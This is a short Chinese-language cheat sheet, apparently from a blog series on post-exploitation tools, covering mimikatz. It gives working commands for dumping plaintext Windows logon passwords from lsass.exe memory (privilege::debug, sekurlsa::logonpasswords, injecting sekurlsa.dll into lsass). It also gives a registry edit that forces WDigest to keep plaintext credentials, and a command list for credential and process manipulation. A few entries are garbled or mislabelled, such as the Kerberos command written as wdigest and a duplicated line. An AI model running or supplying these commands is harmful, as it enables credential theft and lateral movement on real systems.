Menu
后渗透工具系列
- mimikatz —// 下载地址 跃迁s
Ax_Introduciton
mimikatz是一款功能强大的轻量级调试神器,经过它你能够提高进程权限注入进程读取进程内存,获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。该工具已经集成在MSF中。
Bx_Commom_GetPassword
use administrator open
M1 only version2.0
a up
privilege::debug
b catch
sekurlsa::logonpasswords
M2 inject process
a up
privilege::debug
b inject
inject::process lsass.exe sekurlsa.dll
c catch
@getLogonPasswords
因为win10不能保存明文密码,可以通过修改注册表来实现保存明文密码。修改后重启。
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Cx_Common Command
version查看mimikatz的版本
system::user查看当前登录的系统用户
system::computer查看计算机名称
process::list列出进程
process::suspend进程名称暂停进程
process::stop进程名称结束进程
process::modules列出系统的核心模块及所在位置
service::list列出系统的服务
service::remove移除系统的服
service::remove移除系统的服务
service::startstop服务名称启动或停止服务
privilege::list列出权限列表
privilege::enable**一个或多个权限
privilege::debug提升权限
nogpo::cmd打开系统的cmd.exe
nogpo::regedit打开系统的注册表
nogpo::taskmgr打开任务管理器
ts::sessions显示当前的会话
ts::processes显示进程和对应的pid情况等
sekurlsa::wdigest获取本地用户信息及密码
sekurlsa::wdigest获取kerberos用户信息及密码
sekurlsa::tspkg获取tspkg用户信息及密码
sekurlsa::logonpasswords获登陆用户信息及密码